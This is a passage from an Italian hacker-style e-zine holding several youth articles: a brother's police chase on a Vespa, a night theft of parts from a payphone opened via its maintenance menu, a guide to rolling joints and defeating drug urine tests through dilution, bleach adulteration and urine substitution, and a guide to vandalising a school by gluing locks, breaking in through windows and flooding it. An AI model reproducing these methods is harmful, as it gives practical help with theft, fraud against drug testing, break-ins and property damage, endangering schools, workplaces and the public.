provare i nostri motorini.                     
I motorini avevano caratteristiche spaventose, ma anche molti difetti
lo scarabeo era fenomenale, poiche pur avendo un assetto bassissimo 
nelle curve aveva una resa stupenda, per non parlare poi delle altre   
prestazioni;	
il mio scooter non era molto stabile nelle curve , ma nel traffico 
assumeva una manovrabilita' eccezionale soprattutto nel cosidetto    
Zig-zag.....come mi piacerebbe rifarlo....a cosa darei.....lol 
Credo che voi pensiate che io sia un pazzo, si questo pure è vero, 
ma non bisogna escludere che io ed Emilio siamo dei grandi.......sfido     
chiunque a fare quello che ho fatto io.		
Beh...ora vi saluto perche non so cosa dirvi piu.....	
Se volete scrivermi la mia E-mail gia la conoscete....
Okk vi saluto alla prossima.......ByEzZ.....	

Ringrazio gli amici di IRC e non....
Giadina ti amo:))		
	
w w w . h a c k e r s a t . c o m           [Jrash]°			





/===========================::=============================::=================/
/  /L'inseguimento /                                         Jrash            /
/===========================::=============================::=================/




Ciao gentaglia, sono Jrash il matto; in questo articolo che giudico molto sfizioso 
vi parlero' di una cosa accaduta a mio fratello maggiore un paio di anni fa'.
Mio fratello si chiama genny, ha 9 anni piu di me e fino a poco fa' possedeva 
una vespa 50. All eta' di 16 anni, cioè ben 10 anni fa'girava con la sua vespa 
per le strade della  mia citta', Salerno, senza casco(il casco allora non 
andava di moda). Quando giro a un' angolo  della strada , guarda un po' 
la sfiga incontro'due chips (poliziotti sulle moto) davanti a un bar.
Questi appena videro mio fratello senza casco mostrarono la paletta per fallo accostare 
per poi sequestrargli la vespa. Mio fatello che non è un fesso fece finta
di accostare per poi partire alla massima velocita'. Qui viene il bello...seguitemi 
che inizia l inseguimento.I poliziotti non stando al fatto accesero la sirena e 
iniziarono a seguirlo. L'inseguimento duro per ben 40 minuti di puro fuoco .
Mio fratello per prima cosa si fece un tratto di strada sul marciapiede e poi scese 
un paio di gradini con la sua vespa; dopo essersi fermato per vedere dove erano andati 
a finire i chips, continuo nella sua fuga.
In quel giorno la sfiga lo perseguitava : per il cammino incontro un'altra coppia 
di poliziotti che stavano facendo il posto di blocco....Mio fratello non si fermo 
ed anche questi si unirono ai colleghi. Vedendo che la situazione stava mettendosi 
male decise di nascondersi in un portone di un palazzo, e cosi' riusci a svignarsela. 
Incosciente che i poliziotti stavano ancora in agguato dopo solo dieci minuti usci 
dal suo nascondiglio . Subito dopo essere uscito dal portone ecco che si ritrova 
di nuovo i chips alle calcagne, mentre l altra coppia di sbirri gia aveva rinunciato..
Continuo' nella sua fuga: per prima cosa ando in una strada zeppa di auto, un vero 
e proprio caos e li' riusci' a distaccarsi un po' dalla police perche' lui con la 
sua vespa era molto piu' agile nel traffico; poi ando' verso 
la periferia e se ne scappo in una stradina di campagna semi distrutta...   
Ora per i poliziotti era davvero un bel problema perche' le loro moto non erano 
adattte per questo tipo di strada.            
Dopo dieci minuti, mio fratello ritorno sulla strada normale, e senza fare il buffone 
si fece piu' di un kilometro in controsenso rischiando la morte... 
i poliziotti continuavano  a seguirlo , fino a quando due pullman nel 
tentativo di sorpassarsi l'uno contro l'altro chiusero la strada a mio  
fratello che per evitare l impatto con l automezzo dovette frenare bruscamente, 
e il poliziotto a  sua volta freno' anch'egli, pero' purtroppo la sua moto 
non resse la frenata  e quindi scivolo' provocando una brutta caduta  
ai danni del poiziotto che  per fortuna non si fece nulla di grave.   
Alla fine pero' mio fratello cosciente di quello che aveva provocato accosto 
per soccorrere il poliziotto che quando si alzo da terra , prima lo prese    
a schiaffi e poi chiamo 'il carrattrezzi per sequestrare la vespa, inoltre   
gli fece una multa di 500.000 lire per guida pericolosa ed altro...		

Eccomi qui anche questo racconto è teminato, se avete voglia di parlarmi su tutto 
quello che riguarda mezzing non esitate a chiamarmi, la mia E-mail la conoscete ma 
per quelli che non ka conoscono ve la ripeto volentieri: jrash@hackersat.com	

Vorrei salutare gli amici di #buonavolonta, e in particolare Maryee e alterego^..		
Un bacio alla mia giada....A[v]a[t]A[r] il castoro........			





/===========================::=============================::=================/
/  /Italian freching /                                       A[v]a[t]A[r      /
/===========================::=============================::=================/




                                ItAliaN FreChINg


Mi raccomando date un sguardo al disclaimer lo so che è palloso ma è pur 
sempre obbligatorio.

DisclaiMer:

Questo testo è stato scritto a solo scopo informativo, i personaggi e i 
contenuti presenti in questa narrazione sono da ritenersi frutto della 
mente malata dell'autore che non si assume nessuna responsabilità per 
gli atti dai voi commessi.Prima di fare qualche cazzata rifletteteci 
su e se proprio volete farla prendetevi tutte le vostre responsabilità.

EnD Of disclaimer


Eccoci di nuovo a scrivere per dn che cresce sempre di piu sia in qualita che in 
quantità. Io cerco di essere sempre utile con i miei testi e credo che questa 
crescita sia dovuta anche al mio contributo.
Eppure stavo rischiando di non scrivere neanche un articolo per questa 
edizione (forse vi avrebbe fatto piacere) visto che la scheda madre del 
mio adorato pc se ne andata per sempre.In questo momento il mio computer 
starà per essere riparato e quindi presto tornera ad essere utilizzato 
al meglio.Sicuramente a tutti i lettori sara sorta un domanda che ritengo 
scontata:
MA ALLORA COME CAZZO STAI SCRIVENDO QUESTO ARTICOLO.
Ed io tanto semplicemente vi rispondo:
STO SCRIVENDO QUESTO ARTICOLO DAL PC DI SYN.
aPPROPOSITO DI SYN (cazzo avevo dimenticato le maiuscole) lo sapevate che 
sta imparando a suonare la chitarra.Vabbe penso che non ve ne freghi piu di tanto.
Cmq iniziamo con la narrazione che si appresta ad essere uno dei migliori 
articoli della storia del phreaking.


Start of Narration



Era un sabato sera come tanti anzi no era peggiore infatti pioveva e io,syn,Jrash
minm e Zi_pePp fummo costretti ad uscire a piedi in cerca di un po di 
divertimento.Dopo esserci messi d'accordo sulla destinazione ci incamminammo 
verso il Mc_donald della mia città, per la strada parlavamo tranquilli dei 
soliti problemi ignari di quello che ci aspettava qualche ora dopo.Arrivammo 
al mC-capocchia e dopo aver mangiato qualcosa e aver tentato qualche impresa 
di tacchinaggio ci avviamo sconsolati per le vie della città.
Quella sera camminammo non so per quanti chilometri forse 20 e alla fine 
eravamo esausti; scausalmente ci fermammo a riposare su una sbarra , avete 
presente quelle dei parcheggi o dei passaggi a livello,bene, e neanche a farlo 
apposta indovinate cosa c'era a soli due metri di distanza,le nuovissime cabine 
della Telekoz.Anche se non avevamo bevuto ne fatto uso di sostanze stupefacenti 
eravamo fuori di brutto (il primo era il sottoscritto) mi diressi verso la 
cabina rassicurato dalla calma della notte e la solitudine del posto.Arrivato 
vicino alla cabina inizia a smanettare un po con la tastiera e credetemi 
senza nenche fare un graffio alla cabina ne dando qualche colpo improvvisamente 
il display si illumino e usci scritto:

MENU DI MANUTENZIONE: TEST DIAGNOSTICI 

Da qui si poteva accedere a tutte le funzioni della cabina semplicemente muovendosi 
con qualche tasto.Entusiasta chiamai Syn che appena arrivo esclamò:
BELLA AVA OTTIMO BRUTE FORZING
a questa frase io risposi:
MA QUALE BRUTE FORZING QUESTO SEMMAI E' UN CULE FORZING
Ora vi elenco lo schema dell'appendice "Test diagnostici"

                                      

                                   TEST DIAGNOSTICI

---------------------
MODEM/AB             
---------------------
MODULO BASE
---------------------
REVISIONI SW/HW
---------------------
TELEFONATA
---------------------
CONT. TELEFONATA
---------------------
LETTORE CARTE        
---------------------
MODULO MONETE
---------------------
DISPLAY
---------------------
MICROTELEFONO
---------------------
LINEA
---------------------
BATTERIA
---------------------
SPORTELLO
---------------------
EEPROM/FLASH
---------------------
DTS
---------------------
FAX
---------------------
SERRATURA
---------------------
SCONTRINATRICE
---------------------
C
---------------------
BUS
---------------------
B.BUS             
---------------------
GANCIO              
---------------------
TASTIERA            
---------------------                    


Bene queste erano tutte le voci che comparivano ed io dopo aver 
trascorso piu di un ora ad esaminarle tutte senza pero ottenere 
nessun risultato soddisfacente mi soffermai su la voce 
"Sportello" e utilizzando i tasti sul lato sinistro della
cabina notai che compariva questa scritta:     

SPORTELLO CABINA --------->  APERTO

A quel punto fui assalito da una strana sensazione che mi 
rese immobile per qualche secondo.Passato questo istante come 
per istinto misi le mani sul lato superiore della cabina e diedi 
una botta secca.Lo sapete cosa accadde,mi ritrovai con la 
parte anteriore della cabina in mano.
A quel punto inizia a vedere cosa conteneva al suo interno 
la cabina ma visto che c'era ancora troppa gente in strada
decisi di socchiuderla e di tornare piu tardi per trafugare
qualche pezzo.Cosi io con gli altri boys ce ne andammo
a fare un giro maprima preso da un'iresistibile voglia mi
avvicinai alla cabina e mi presi un ricordino giusto per 
non rimanere a mani vuote durante l'attesa.
Dopo aver strappato quel pezzo io con tutta la banda iniziammo
a correre per andare in un luogo piu solitario.Durante la corsa
urlai "Italian freching" da quella frase come potete intuire ho 
preso spunto per il titolo.
Aspettammo in una stradina buia per un po e poi verso le ora 01:00 
ci incamminammo per tornare sul luogo del delitto ma per la strada
notammo che la pula si era fermata proprio davanti la cabina.Noi
pensammo che fosse li causualmente e allora continuammo a camminare
dividendoci e facendo i tipi indifferenti.Io e ZI_Pepp eravamo quelli
che stavano piu avanti di tutti e avevamo gia superato la pula che 
si era fermata con la volante qualche metro piu indietro di noi.
Ad un certo punto mi girai quardando nella loro direzione e vidi 
che due agenti erano scesi dalla macchina e si stavano dirigendo
verso di noi con un passo molto veloce.
A questo punto io e gli altri iniziammo a correre e durante la 
corsa ci dividemmo per rendere la vita piu difficile alla pula.
Dopo aver corso per non so quanto mi ritrovai solo con jrash e  
Zi_Pepp sotto un ponticello non illuminato.SYn e gli altri non 
avevo proprio idea di dove fossero andati a finire.Cmq dopo pochi
minuti mi arrivo una telefonata di syn che mi aveva detto che si
trovava in un luogo sicuro cosi dopo poco lo raggiungemmo.
Decidemmoche era meglio lasciar perdere per quella sera cosi ognuno
si ritiro a casa propria. 
Arrivato a casa mi spogliai e dopo essermi messo il pigiama andai
a letto e poi........
Non penso voi abbiate voglia di leggere la cronaca della mia
vita quindi proseguiamo.
Ci rincontrammo tutti la sera seguente cosi con il solo
intento di finire il nostro lavoro 
e cosi organizzati e armati di cacciaviti ci avvicinammo 
alla cabina e asportammo tuto quello possibile.I pezzi che
trafugammo e di cui poi abbiamo anche scattato le foto che
dovrebbero essere allegate a Dirtynet sono i seguenti: 

BATTERIA

lETTORE SCHEDE

DISPLAY

MODEM INTERNO 

Abbiamo anche molti altri pezzi che ancora dobbiamo esminare,
in poche parole ci siamo portati la cabina a casa tranne pero
l'involucro di acciaio.Pensate che la cabina è ancora li chiusa
senza nulla dentro e vista dall'esterno sembra una normale cabina.  
[Sul sito ufficiale di DirtyNet www.hackersat.com potete ammirare
anche le foto ricordo fatte in giorni successivi.]
Portammo tutti i pezzi nel garage di jrash e li esaminammo uno
ad uno.
Nell' esaminare il lettore schede notammo che esso è composto da tre
parti unite in sieme che potevano essere sganciate per mezzo di
semplici agganci.Smontando uno di queste tre pezzi notammo che
questo conteneva una sim card identica a quelle dei cellulari,
allora provammo ad inserirla nel telefonino di jrash ma non 
accadeva nulla.Visto che sulla sim non era specificata la grandezza
in kb ho pensato che forse un normale telefonino non puo leggere
una carta sim di grandi dimensioni cmq questa è solo un'ipotesi 
se qualcuno avesse qualche notizia puo farmelo sapere scrivendomi
alla solita e-mail.Ah dimenticavo sulla sim c'era un numero
probabilmente seriale ora vi riporto il codice sotto.

:

T0000928
000000001841
M64LEU2GSI
TEL.  ITALIA

:

Bene abbiamo finito io vi ho detto proprio tutto spero che il
mio italiano sia comprensibile altrimenti un po di pazienza non
si puo avere tutto dalla vita.
Ringrazio: 
-sYn che ha messo a disposizione il suo computer che mi ha permesso 
 di scrivere la prima parte di -questo articolo.  
-Zi-Pepp,Jrash,MinM, anche loro prottagonisti di questa avventura. 
-Tutti i ragazzi del Dj time che hanno fatto da colonna sonora di
 questo articolo.
-Tutti le mie ammiratrici sparse per l'italia.












/===========================::=============================::=================/
/  /Maria consigli e oltre /                                 phaet            /
/===========================::=============================::=================/




                                                      NaRCoTiNG

 Introduzione:
Prima abbiamo parlato della coltivazione della buonissima Maria ora 
parliamo del suo utilizzo =)) (questa parte mi fa morire)!!! bisogna dire ke qui 
a Salerno nn e' ke giri molta maria ma gira abbastanza Hashish e parlero' sopratutto di 
quest' ultimo! Ultimamente ho provato nel cesso della scuola della crema di 
marocco e devo dire ke e' mooooolto buona e sono rimasto sballato per circa 4 ore!!!!  
PROVATELA RAGA!!!!


 Come si rolla:
Per i meno esperti ho deciso di inserire questo breve articolo al rollaggio 
ovvero alla kiusura della canna, joint, spinello o come cavolo lo volete kiamare: 
Una canna si rolla come una sigaretta. 
Arrotola il filtro tra pollice e indice di una mano. 
Con l'altra mano (pollice, indice e medio) livellare il tabacco.
Avvolgere la cartina intorno al filtro e fare scorrere il foglio intorno al tabacco. 
Leccare la gomma ed incollare la cartina. 
Comprimere delicatamente il tabacco con una penna o un filtro di sigaretta. 
Legare l' estremità della canna in caso di trasporto. 
Non fumare più carta di quanto sia necessario!
Rollare la canna con la parte gommata all'esterno.
Umidificare la gomma e ripiegare la cartina, bruciare la carta eccedente.
Molto utile per gli spini o per le cartine King size.

                                                           MiNkIa KE PAuRa
vostra mamma vi fa fare le analisi delle urine per vedere se fumate??!! NO PROBLEM!! 
(mia mamma me le ha fatte fare ultimamente e sono uscite negative cioe' pulite!)
METODI DI PROVA

Ci sono quattro tipi di test delle urine, una prova del capello, una prova di 
traspirazione e di una prova di rimanenza. 
Prima di continuare, devo dire che questo testo principalmente si applica all'analisi 
delle urine che è il più diffuso perché è quello che costa meno. Tuttavia, provo a 
coprire metodi per passare tutti i test.
1 Sostanze che sono individuabili:
La tavola sotto indica che cosa può essere trovato in prove di selezione.

[TABELLA]

Anfetamine
Antidepressivi .
Barbiturici
Benzodiazepine
Cannabinoidi
Cocaina .
LSD.
Metadone .
Morfina
Sonniferi .
Steroidi.
oltre al test delle urine vediamo prima quello del capello ke per molti e' un metodo 
sconosciuto e vediamo come funziona:
Test del Capello: Quando i metaboliti del THC sono nel sangue, essi passano attraverso 
i vasi di sangue nella testa e rimangono nei capelli. i metaboliti del THC rimangono 
nei capelli come una registrazione permanente. La prova di capelli costa 300 - 600.000 e 
è raramente fatta perché l'analisi delle urine è più economica (circa $130.000) e più 
affidabile. ( l'apparecchiatura costa intorno al milione di $). Questo test consiste 
nell'analizzare una ciocca di capelli, polverizzata e sciolta in solventi, attraverso 
la Gas Cromatografia/Spettrometria di Massa. I capelli crescono in genere di 0,5 cm al 
mese quindi si può indagare il passato se hai i capelli di 10 cm si può controllare il 
tuo consumo di droga dei passati 20 mesi.

Passare la prova di capelli è estremamente difficile, per fortuna, la prova del capello 
non ha validità legale.
Esistono sul mercato e si stanno sviluppando in America numerosi Shampoo ma la loro 
efficacia è tuttora dubbia
TEST ESEGUITI PER RILEVARE ANTIDOTI AL TEST
I laboratori sanno come sia facile manomettere campioni di urina e modificare i risultati. 
I laboratori fanno spesso prove per scoprire se il campione è legittimo.
1) colore: Se un campione di urina sembra chiaro, il laboratorio sospetterà che sia 
stato allungato con acqua. È possibile che essi non lo descrivano come positivo, ma 
essi possono rifiutare il campione e informare chi ha richiesto il test del tuo 
tentativo di falsificare la prova. La vitamina B colora di giallo l'urina.

2) temperatura: L'urina dovrebbe essere tra 32 e 36 gradi. I laboratori controllano 
la temperatura per prevenire l'aggiunta di acqua e la sostituzione dei campioni con 
campioni puliti.

3) Creatina: è una sostanza prodotta da vertebrati e è presente nell'urina. 
I Laboratori cercano la creatina per verificare che l'urina non venga sostituita 
con qualcosa diverso. Mangiare cibi ricchi di carne rossa aumenterà i livelli di 
creatina.

4) pH: il PH cambia facilmente quando la gente trucca il loro campione con prodotti 
di fatti in casa. Utilizza cautela nel truccare l'urina, il pH è di solito testato.

5) Peso Specifico: un Peso Specifico insolito indica che un campione è stato manomesso.

E ora parliamo della fatidica URINA!!!!! ecco alcuni metodi per sputtanare il 
laboratorio di analisi (10x a mio zio ke mi ha fornito i dati)
PRODUZIONE DI URINA PULITA

Il THC è solubile nei grassi, e viene conservato nelle tue cellule grasse. 
Eliminarlo dai tessuti grassi è molto difficile. Molti prodotti erbacei sostengono 
di ripulire il tuo corpo, tuttavia non fanno niente per rimuovere i sottoprodotti 
del THC dalle cellule grasse.

Uno studio è stato fatto in Germania nel 1993 su 50 delle erbe più comuni utilizzate 
dalla gente che prova a passare i test. Tutte le 50 erbe non sono riuscite a far 
passare il test. Sfortunatamente, questa chiacchera non morirà. L'unico modo per 
estrarre THC da cellule grasse è fare esercizio fisico (5.8). Le cellule grasse 
secernono grasso con i metaboliti del THC a un tasso costante, indipendentemente 
da quali erbe tu assumi. Tu puoi essere in grado di pulire temporaneamente THC 
metabolites dal tuo flusso sanguigno o diluire i tuoi fluidi per produrre un 
rapporto THC/urina minore, ma il tuo flusso sanguigno continuerà a ritirare il 
THC dal grasso e la tua urina continuerà a ritirare metaboliti dal flusso sanguigno.

1) diluizione: Iper saturare il tuo corpo con fluidi diluirà i metaboliti possibilmente 
sotto la 50 soglia ng/mL, a seconda del tuo metabolismo. Sii consapevole che i livelli 
creatina vengono spesso testati e mostreranno che il campione è stato diluito. Diluire 
il tuo campione produrrà anche urina chiara, senza potenzialmente alcun colore giallo.

È utile cominciare a bere subito prima della prova.
Quelli che si affogano in giorni fluidi prima di una prova causano solo disagio non 
necessario. Quelli che stanno alzati tutta la notte bevendo non hanno maggiori 
possibilità di uno che beve la pesantemente per prima cosa la mattina.
Alzati presto se la prova è di prima mattina, ma non perdere sonno se la prova è 
di giorno.

1 acqua: Bevi almeno otto bicchieri grandi di fluido (preferibilmente acqua) appena 
prima della prova. L'acqua non diluisce il THC ma solo l'urina e temporaneamente. 
Risulta molto Utile.

2 livello di Creatina: Mangiare carne rossa aumenterà livelli Creatina. Se tu mangi 
carne rossa 3 giorni prima della prova, il tuo livello di Creatina sarà normale e il 
laboratorio non saprà che tu hai diluito il tuo campione di urina.

3 vitamina B: Colora di giallo il tuo campione portando a da 50 a 100 milligrammi di 
vitamina B. Molte vitamine funzioneranno, ma B-2 o B-12 (trovati in vitamine B complesse) 
sono le più efficaci, sebbene alcuni argomentano che la vitamina C sia migliore. Questo 
aiuterà anche se tu prevedi di truccare il campione.
Questo non garantisce che la diluizione funzionerà se i livelli di Creatina, PH e il peso 
specifico non sono rispettati.

2 diuretici: I diuretici fanno in modo che la gente urini frequentemente e che quindi il 
campione risulti diluito. Caffè, succo di mirtillo, birra, tè, Pepsi e tisane, sono tutti 
buoni diuretici.

3 aceto: C'è un mito che bere aceto maschera le droghe; Non è vero. Tuttavia, l'aceto 
diminuisce il pH dell'urina. Le anfetamine sono espulse fino a 3 volte più velocemente 
quando l'urina è più acida. Cosicché l'aceto potrebbe ridurre il periodo di tempo di 
scoperta per anfetamine.
Non vale la pena bere aceto e causa diarrea.

5 fibra: Una dieta ricca di fibre aiuterà a espellere i metaboliti solubili tramite 
l'intestino piuttosto che nell'urina.

7 Come dare un campione pulito: Non dare urina della prima pisciata del giorno. È la 
più sporca e può essere piena di metaboliti. Urina un paio di volte prima di dare un 
campione di prova. Inoltre, non dare l'inizio o la fine della pisciata. Piscia nel 
gabinetto, quindi fermati velocemente e dai il campione, spostati al gabinetto per 
l'ultima parte

8 esercizio fisico: Gli atleti hanno un grande vantaggio rispetto alle persone normali. 
Quando il grasso è bruciato, i sottoprodotti del THC sono rilasciati nel sangue. Questo 
è l'unico modo per espellere i metaboliti dai tessuti grassi. "la vita normale li 
brucerà lentamente, quando i tessuti grassi li rilasceranno" (Dott. Grow).
Fare esercizio fisico pulirà il tuo corpo dai metaboliti più velocemente, diminuendo 
così il periodo di scoperta. Smetti di fare esercizio una settimana prima della prova 
perché siccome elimini metaboliti quando fai sport, la loro presenza nel sangue e 
nelle urine è più alta. Essere pigro e mangiare molto farà si che il corpo immagazzini 
i grassi e il metabolita viene a sua volta immagazzinato piuttosto che espulso.

 ANTIDOTI ALLA DROGA
Alcune sostanze chimiche prese oralmente mascherano le tracce di droghe nell'urina.
Antidoti che funzionano:

1 L'Aspirina: prendere 4 aspirine alcune ore prima della prova potrebbe aiutarti.
L'aspirina interferisce con il metodo di test spettrometrico dell'urina e consiglio 
certamente di sfruttare la situazione e utilizzare aspirina.

 ALTERARE I CAMPIONI

"drogare" campioni consiste nell'aggiungere al campione varie sostanze chimiche.
Sostanze chimiche che impediscono all'immunoglobulina di legarsi all'antigene vi 
faranno risultare negativi al test delle urine.

1 additivi Efficaci: Questi additivi sono raccomandati.

2 Candeggiante: Il candeggiante in Polvere vi varà risultare negativi e è il miglior 
additivo fatto in casa. In un'emergenza, Jeff Nightbyrd raccomanda di aggiungere 
cristalli di candeggina inodore a un campione diluito. Si raccomanda che macini la 
candeggina polverizzata a un grano più fine. 1/4 cucchiaino da tè è raccomandato per 
un campione da 60cc.

Se hai della candeggina liquida aggiungi al campione da 60cc da 6 a 10 gocce.

La candeggina però alza il Ph; cosicché può essere evidente che il campione era 
manomesso. Alcune candeggine spumeggiano o lasciano residui, fai esperimenti con 
varie marche prima di scegliere quale utilizzare.

3 acqua: Tu puoi diluire il tuo campione pesantemente con l'acqua. Puoi anche 
aggiungere l'acqua direttamente al campione. Assicurati di utilizzare l'acqua 
calda (tra 32 e 36 gradi), perché probabilmente prenderanno la temperatura del campione.

Fai sembrare che tu lavi le mani o qualcos'altro.

2 additivi Inefficaci: Questi additivi non sono raccomandati. Molti di questi 
possono dare risultati di prova negativi, ma non sono raccomandati.

1 ammoniaca: 60 grammi renderanno il campione negativo. Ma il pH viene modificato e 
l'odore di ammoniaca è facile da essere riconosciuto.

2 sangue: È stato detto che alcune gocce di sangue aggiusteranno il tuo campione; 
non funziona

5 perossido di Idrogeno (Acqua Ossigenata): nelle concentrazioni in commercio 
distruggerà metà dei metaboliti.

6 succo di Limone: Il succo di limone è un mito; non cambierà i risultati della prova.

7 sapone Liquido: Funziona, ma rende il campione torbido, è certamente sospetto.

8 il SuperClean 13 di Mary Jane 

9 Purifyit : Creato in Europa, Oklahoma NORML (ditta americana) si rifiuta di rivendere 
questo prodotto perché ha bocciato troppi conducenti di autocarro.

10 nitrato di Sodio: Questo è più efficace del sale da tavola(sotto), ma si scioglie male.

11 sale da Tavola: Due cucchiai da tavola di sale darà risultato negativo, ma mette la 
densità fuori dalla gamma normale. Il residuo può essere visto anche in fondo alla provetta.

12 UrinAid : UrinAid, prodotto da Byrd Labs, è molto potente e funziona ogni volta 
per mascherare il THC e nicotina ma non cocaina o eroina.
UrinAid è provato nel 5% dei laboratori. Oklahoma NORML ha cessato di vendere 
questo prodotto perché è "troppo individuabile". In Italia probabilmente FUNZIONA.

13 aceto: Aggiungere aceto al tuo campione darà risultato negativo, ma fa cadere 
anche il pH. Infatti, diminuire il pH è fa in modo che il campione sia negativo. 
Ma il Ph viene testato e ti scopriranno.

14 Visine (Gocce Nasali): risultato discutibile. Byrd Labs ha concluso che Visine 
non funziona. Clinton ha detto che il laboratorio in cui egli ha lavorato provava 
Visine e ha concluso che Visine da una negazione falsa per l'esame delle urine

15 WD40: Un altro mito. WD40 può solo fare a danno.

3 additivi Non Testati

1 Papain: Questo è un enzima disponibile in farmacia. Non è risaputo se questo 
faccia qualcosa. provato e può o non può funzionare.


9. SOSTITUZIONE DELL'URINA

Questo metodo funziona per ogni prova di urina, sempre.
Tu semplicemente dai a loro urina pulita (non la tua). Questo funziona molto bene se tu non 
sei sorvegliato.
Se sarai sorvegliato, prova a chiedere di essere lasciato solo " non voglio che 
mi guardi mentre piscio!.


1 metodi di Sostituzione: Ci sono tre metodi, ma due di loro sono dolorosi. 
Il modo più comune è portare urina è in un contenitore nascosto.

1 contenitore Nascosto: Nascondi semplicemente l'urina. La prima volta che tu sei 
solo con il contenitore che ti danno, scarica la tua urina nascosta. 
Assicurati di potere aprire quietamente il contenitore; il personale di laboratorio 
può origliare alla porta. Porta i pantaloni lunghi. Se così, un profilattico può essere 
nascosto sotto i pantaloni vicino alla coscia.
Le femmine possono tenere un condom con il campione di urina nella vagina e pungerlo 
con un'unghia e pisciare sotto supervisione. Assicurati di tenere i campioni tra 32 e 36 gradi.

2 dove ottenere urina pulita.

1 Urine da un donatore: Tu puoi usare l'urina di qualcun altro. 
Chiedi (auspicabilmente un amico in cui puoi avere fiducia) al tuo donatore di urina 
quali droghe essi hanno preso nel mese scorso. Se l'urina invecchia oltre 18 ore, 
il deterioramento diventa notabile e il laboratorio può sospettare qualcosa.

1 Urina in Polvere: Conserva la tua urina quando sei sicuro di avere fatto un buon 
periodo di astinenza, 30 giorni sono sicuri.
Urina in un contenitore di vetro. Fai evaporare. Quindi raschia l'interno 
per il residuo. Mescolalo con l'acqua prima della prova e il campione avrà 
la gravità specifica corretta, pH, colore, ecc.

3 urina di Cane: L'urina di cane può essere utilizzata nella sostituzione e passerà la prova!
Questa sotto sezione suppone che tu abbia un cane pulito. So che l'urina del 
mio cane non passerebbe; egli mangia più erbaccia degli esseri umani. 
Avrebbe più senso utilizzare urina umana, ma l'urina di cane può servire in un'emergenza.

10. RUBARE IL CAMPIONE

Rubare il campione, può funzionare perché il laboratorio non ammetterà mai che 
il campione sia andato perso e non chiederà di rifare la prova.
Non aspettarti che questo metodo funzioni se tu vieni provato dalla 
polizia o dai militari.     

Finitoooooooooo!!! mi raccomando raga so ke nn mi starete mai a sentire ma io 
lo debbo dire : usate questi consigli solo in casi urgenti vabbuo' si vede ke 
ho appena fumato??   





/===========================::=============================::=================/
/  /Come impallare la scuola /                               sYn              /
/===========================::=============================::=================/





Salve ragazzi.
Se leggete questo articolo significa che odiate la scuola vero?
Se c'è qualcuno che la ama mi invi una email!
Io la scuola la odio da parte dei professori, xchè a me piace un sacco imparare le materie.
Comunque adesso facciamo male a questa stramaledetta struttura poco organizzata.
Vi incito tutti a farvi un giro di notte nella vostra amata scuola, vi potra' sempre servire. 
Ad esempio per vedere le luci accese, le abitazioni vicine ecc...
Quando io e i miei amici entriamo nella scuola ci mettiamo ad impennare un po' col mezzo.
Naturalment vi potrete chiedere, come entriamo se è recintato?
A questa domanda poco posso rispondere. Infatti la nostra scuola è 
minimamente protetta, x questo entra anche un motorino!
Dovreste scavalcare i recinti o fare altro...insomma con questa impresa dovete 
cavarvela voi.
Adesso passiamo ad impallarla un po'.Andate di notte e nella serratura del cancello 
principale inserite della colla (tipo attack) ad adesione istantanea o meglio
del silicone. In questa operazione potete abbondare con la sostanza. 
I bidelli che vengono alle 7 proveranno in tutti i modi di liquefare la colla o altro.
una volta lo abbiamo provato ha funzionato ma... solo per 1 ora!
Naturalmente gli alunni staranno fuori dall'istituto ad aspettare che il problema 
venga risolto, ma ben presto si risolvera' nel frattempo molti degli 
alunni avranno gia fatto la saggia decisione di marinare !!

Il testo a questo punto sarebbe finito...ma voi mi odiereste a morte!
Allora passiamo ad un'altro imapallamento.
Poco graditi agli alunni sono i cosidetti "vermi".
Questi vermi (molti) dovreste gettarli per le scale o per le singole aule .
Inutile che ve lo dica, è meglio entrare nell'istituto di notte e gettarli, xchè 
potrste facilmente essere presi con le mani nel sacchetto!
Ma avere accesso proprio nell'istituto è difficile; difficile solo se ci sono delle 
protezioni anche alle finestre delle aule esterne.
Altrimenti dovreste avere le chiavi...ma questo ve lo spieghero' dopo.
Prendiamo di esempio che non ci siano protezioni ai vetri.
Andate 3 di voi (almeno in 3 dovete stare) nei pressi dell'istituto e organizzatevi 
oltre a vedere se ci sono delle complicazioni.
Uno di voi deve rimanere nell'esterno dell'istituto . 
Ognuno di voi deve possedere un telefonino con i toni silenziosi.
Il ragazzo che si trova all'esterno deve solamente avvertire se accade qualcosa.
Due di voi invece devono penetrare nell'istituto.
Spaccate con un panno sulla mano un vetro di una classe al primo piano ed entrate 
facendo preferibilmente poco rumore. Ad andate per classe in classe a spargere i 
vostri vermi (acquistate i bigattini o meglio quei vermi simili alle esche coreane..oppure 
fabbricateli voi!).
Dato che ormai siete dentro ci sarebbe una notevole alternativa o diversivo ai soliti vermi.
Ovvero "l'allagamento".
Ebbene si la vostra scuola non è stata mai allagata ? C'è sempre una prima volta. 
E' una cosa abbastanza semplice.Andate in quasi tutti i bagni e iniziato a chiudere 
i lavandini e poi aprite i rubinetti al massimo. Potreste fare anche così :
Se ci sono delle pompe idrauliche potreste usarle e lasciale aperte, 
posandole sul piano + alto dell'istituto. Fate questa operazione con cautela 
e non troppo fracasso.
Bene una volta che avete finito quello che dovevate fare dentro l'istituto 
dovete uscire.
Avvertite il compagno che state per farlo.
A questo punto l'ideale è uscire per un'altra parte, non per l'entrata principale della scuola.
Questo lo dovete fare sopratutto se accidentalmente scatta l'allarme mentre state dentro.

Ad esempio (mio istituto):









              CAMPI


                                                         ingresso principale
- - - -- -  - -- - - -  -  - - -  ---  -- - - - -- -   |- -- - - - - - -  - -- - -|- -  -- 
   /
   /
   /
   /
 c /
 a /
 m /
 p /
 i /
   /
   /
   /                                                             
   /
   / <--------------- qui potreste scavalcare o oltrepassare
   /
   /                                                          
   /
   /
   /                         -----------------------------------
   /                         \                                 \
                             \                                 \
                             \                                 \
                             \                                 \
                             \                                 \
            ------           \                                 \
            -    -           \                                 \
            -    -           \                                 \
            -    -           \             ISTITUTO            \
            -    -           \                                 \
            -    -           \                                 \
            -    -           \                                 \
            -----            \                                 \
         palestre            \                                 \
                             \                                 \
                             \                                 \
                             \                                 \
                             \                                 \
                             \                                 \
                             \                                 \
                             \                                 \
                             \                                 \
                             \                                 \
                             \                                 \
                             \                                 \
                             \                                 \
                             \                                 \
                             \                                 \
                             -----------------------------------



                                                                        |
                                                                        | usatela solo se sbocca
                                                                        | in isolati poco 
                                                                        | abitati
                                                                        |
                                                                       \/

                                                       | uscita secondaria |
-------------------------------------------------------                       -----------------




Questo che vi ho appena citato non sono tutti i medoti per mandare la scuola a puttane 
ce ne sarebbero degli altri, pero' questi sono tra i migliori.
An piccolissimo esempio è scrivere con bombolette su tutti i muri frati ingiuriose o altro...
